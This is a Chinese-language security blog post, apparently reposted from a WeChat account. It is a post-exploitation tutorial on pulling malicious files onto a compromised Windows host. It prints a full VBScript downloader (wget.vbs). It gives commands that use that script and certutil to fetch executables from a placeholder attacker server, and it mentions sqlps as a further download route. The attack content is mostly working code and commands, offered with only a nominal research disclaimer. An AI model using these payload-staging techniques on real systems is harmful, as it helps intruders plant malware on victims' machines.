失陷Windows主机下载恶意文件的姿势

admin 2024年10月19日23:01:31评论16 views字数 1085阅读3分37秒阅读模式

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

宝子们现在只对常读和星标的公众号才展示大图推送,建议大家把李白你好设为星标”,否则可能就看不到了啦!

0x01 前言

渗透测试时,目标主机是windows主机,拿到shell以后需要往服务器上传文件,此时可以使用两种方法。

0x02 Wget.vbs

on error resume nextiLocal=LCase(Wscript.Arguments(1))iRemote=LCase(Wscript.Arguments(0))iUser=LCase(Wscript.Arguments(2))iPass=LCase(Wscript.Arguments(3))set xPost=CreateObject("Microsoft.XMLHTTP")if iUser="" and iPass="" thenxPost.Open "GET",iRemote,0elsexPost.Open "GET",iRemote,0,iUser,iPassend ifxPost.Send()set sGet=CreateObject("ADODB.Stream")sGet.Mode=3sGet.Type=1sGet.Open()sGet.Write xPost.ResponseBodysGet.SaveToFile iLocal,2
将以上代码保存为wget.vbs格式至服务器,服务器开启http服务
cscript wget.vbs http://xx.xx.xx.xx/123.exe C:/xx/xx/xx/123.exe

C:/xx/xx/xx/为失陷主机的物理路径,123.exe为下载下来的名称。

失陷Windows主机下载恶意文件的姿势

0x03 certutil.exe

certutil.exe为windows服务器上自带的一个exe文件,渗透时可以利用其下载

失陷Windows主机下载恶意文件的姿势
certutil.exe -urlcache -split -f http://xx.xx.xx.xx/w.jpg
失陷Windows主机下载恶意文件的姿势

0x04 sqlps

具有powershell功能,数据库自带,具有微软签名。

涉及到的脚本下载。

失陷Windows主机下载恶意文件的姿势

点击关注下方名片进入公众号

回复关键字【脚本下载相关脚本

文章来源:语雀(penguin-hpnyw)

原文链接:https://www.yuque.com/penguin-hpnyw

往 期 精 彩

失陷Windows主机下载恶意文件的姿势

甲方安全建设|安全合规工作的简单思考与总结

失陷Windows主机下载恶意文件的姿势

记一次Web逆向攻防的实战过程

失陷Windows主机下载恶意文件的姿势

原文始发于微信公众号(李白你好):失陷Windows主机下载恶意文件的姿势

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月19日23:01:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   失陷Windows主机下载恶意文件的姿势https://cn-sec.com/archives/1870395.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息